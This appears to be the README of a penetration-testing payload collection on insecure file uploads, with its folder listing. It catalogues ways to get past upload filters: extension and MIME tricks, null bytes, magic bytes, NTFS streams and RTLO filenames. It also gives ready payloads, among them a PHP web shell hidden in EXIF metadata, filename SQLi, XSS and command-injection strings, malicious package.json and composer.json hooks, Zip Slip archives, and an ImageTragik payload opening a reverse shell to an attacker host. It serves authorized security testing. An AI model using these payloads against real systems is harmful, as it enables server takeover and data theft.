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| Configuration Apache .htaccess | ||
| Configuration Busybox httpd.conf | ||
| Configuration IIS web.config | ||
| Configuration Python __init__.py | ||
| Configuration uwsgi.ini | ||
| CVE Ffmpeg HLS | ||
| CVE ZIP Symbolic Link | ||
| EICAR | ||
| Extension ASP | ||
| Extension Flash | ||
| Extension HTML | ||
| Extension PDF JS | ||
| Extension PHP | ||
| Images | ||
| Jetty RCE | ||
| Picture Compression | ||
| Picture ImageMagick | ||
| Picture Metadata | ||
| Server Side Include | ||
| Zip Slip | ||
| README.md | ||
Upload Insecure Files
Uploaded files may pose a significant risk if not handled correctly. A remote attacker could send a multipart/form-data POST request with a specially-crafted filename or mime type and execute arbitrary code.
Summary
Tools
Exploits
Defaults extensions
- PHP Server
.php .php3 .php4 .php5 .php7 # Less known PHP extensions .pht .phps .phar .phpt .pgif .phtml .phtm .inc - ASP Server
.asp .aspx .config .cer and .asa # (IIS <= 7.5) shell.aspx;1.jpg # (IIS < 7.0) shell.soap - JSP :
.jsp, .jspx, .jsw, .jsv, .jspf, .wss, .do, .actions - Perl:
.pl, .pm, .cgi, .lib - Coldfusion:
.cfm, .cfml, .cfc, .dbm - Node.js:
.js, .json, .node
Upload tricks
- Use double extensions :
.jpg.php, .png.php5 - Use reverse double extension (useful to exploit Apache misconfigurations where anything with extension .php, but not necessarily ending in .php will execute code):
.php.jpg - Random uppercase and lowercase :
.pHp, .pHP5, .PhAr - Null byte (works well against
pathinfo()).php%00.gif.php\x00.gif.php%00.png.php\x00.png.php%00.jpg.php\x00.jpg
- Special characters
- Multiple dots :
file.php......, in Windows when a file is created with dots at the end those will be removed. - Whitespace and new line characters
file.php%20file.php%0d%0a.jpgfile.php%0a
- Right to Left Override (RTLO):
name.%E2%80%AEphp.jpgwill becamename.gpj.php. - Slash:
file.php/,file.php.\,file.j\sp,file.j/sp - Multiple special characters:
file.jsp/././././.
- Multiple dots :
- Mime type, change
Content-Type : application/x-phporContent-Type : application/octet-streamtoContent-Type : image/gifContent-Type : image/gifContent-Type : image/pngContent-Type : image/jpeg- Content-Type wordlist: SecLists/content-type.txt
- Set the Content-Type twice: once for unallowed type and once for allowed.
- Magic Bytes
- Sometimes applications identify file types based on their first signature bytes. Adding/replacing them in a file might trick the application.
- PNG:
\x89PNG\r\n\x1a\n\0\0\0\rIHDR\0\0\x03H\0\xs0\x03[ - JPG:
\xff\xd8\xff - GIF:
GIF87aORGIF8;
- PNG:
- Shell can also be added in the metadata
- Sometimes applications identify file types based on their first signature bytes. Adding/replacing them in a file might trick the application.
- Using NTFS alternate data stream (ADS) in Windows. In this case, a colon character ":" will be inserted after a forbidden extension and before a permitted one. As a result, an empty file with the forbidden extension will be created on the server (e.g. "
file.asax:.jpg"). This file might be edited later using other techniques such as using its short filename. The "::$data" pattern can also be used to create non-empty files. Therefore, adding a dot character after this pattern might also be useful to bypass further restrictions (.e.g. "file.asp::$data.")
Filename vulnerabilities
Sometimes the vulnerability is not the upload but how the file is handled after. You might want to upload files with payloads in the filename.
- Time-Based SQLi Payloads: e.g.
poc.js'(select*from(select(sleep(20)))a)+'.extension - LFI/Path Traversal Payloads: e.g.
image.png../../../../../../../etc/passwd - XSS Payloads e.g.
'"><img src=x onerror=alert(document.domain)>.extension - File Traversal e.g.
../../../tmp/lol.png - Command Injection e.g.
; sleep 10;
Also you upload:
- HTML/SVG files to trigger an XSS
- EICAR file to check the presence of an antivirus
Picture Compression
Create valid pictures hosting PHP code. Upload the picture and use a Local File Inclusion to execute the code. The shell can be called with the following command : curl 'http://localhost/test.php?0=system' --data "1='ls'".
- Picture Metadata, hide the payload inside a comment tag in the metadata.
- Picture Resize, hide the payload within the compression algorithm in order to bypass a resize. Also defeating
getimagesize()andimagecreatefromgif().
Picture with custom metadata
Create a custom picture and insert exif tag with exiftool. A list of multiple exif tags can be found at exiv2.org
convert -size 110x110 xc:white payload.jpg
exiftool -Copyright="PayloadsAllTheThings" -Artist="Pentest" -ImageUniqueID="Example" payload.jpg
exiftool -Comment="<?php echo 'Command:'; if($_POST){system($_POST['cmd']);} __halt_compiler();" img.jpg
Configuration Files
If you are trying to upload files to a :
- PHP server, take a look at the .htaccess trick to execute code.
- ASP server, take a look at the web.config trick to execute code.
- uWSGI server, take a look at the uwsgi.ini trick to execute code.
Configuration files examples
Alternatively you may be able to upload a JSON file with a custom scripts, try to overwrite a dependency manager configuration file.
- package.json
"scripts": { "prepare" : "/bin/touch /tmp/pwned.txt" } - composer.json
"scripts": { "pre-command-run" : [ "/bin/touch /tmp/pwned.txt" ] }
CVE - ImageMagick
If the backend is using ImageMagick to resize/convert user images, you can try to exploit well-known vulnerabilities such as ImageTragik.
- ImageTragik example: Upload this content with an image extension to exploit the vulnerability (ImageMagick , 7.0.1-1)
push graphic-context viewbox 0 0 640 480 fill 'url(https://127.0.0.1/test.jpg"|bash -i >& /dev/tcp/attacker-ip/attacker-port 0>&1|touch "hello)' pop graphic-context
More payloads in the folder Picture ImageMagick
CVE - FFMpeg
FFmpeg HLS vulnerability
ZIP archive
When a ZIP/archive file is automatically decompressed after the upload
- Zip Slip: directory traversal to write a file somewhere else
python evilarc.py shell.php -o unix -f shell.zip -p var/www/html/ -d 15 ln -s ../../../index.php symindex.txt zip --symlinks test.zip symindex.txt
Jetty RCE
Upload the XML file to $JETTY_BASE/webapps/
Labs
References
- Bulletproof Jpegs Generator - Damien "virtualabs" Cauquil
- BookFresh Tricky File Upload Bypass to RCE, NOV 29, 2014 - AHMED ABOUL-ELA
- Encoding Web Shells in PNG IDAT chunks, 04-06-2012, phil
- La PNG qui se prenait pour du PHP, 23 février 2014
- File Upload restrictions bypass - Haboob Team
- File Upload - Mahmoud M. Awali / @0xAwali
- IIS - SOAP
- Arbitrary File Upload Tricks In Java - pyn3rd
- File Upload - HackTricks
- Injection points in popular image formats - Daniel Kalinowski - Nov 8, 2019
- A tip for getting RCE in Jetty apps with just one XML file! - Aug 4, 2022 - PT SWARM / @ptswarm
- Jetty Features for Hacking Web Apps - September 15, 2022 - Mikhail Klyuchnikov
- Inyección de código en imágenes subidas y tratadas con PHP-GD - Spanish Resource - hackplayers
- A New Vector For “Dirty” Arbitrary File Write to RCE - Doyensec - Maxence Schmitt and Lorenzo Stella
- PHP Internals Book - THE .PHPT FILE STRUCTURE
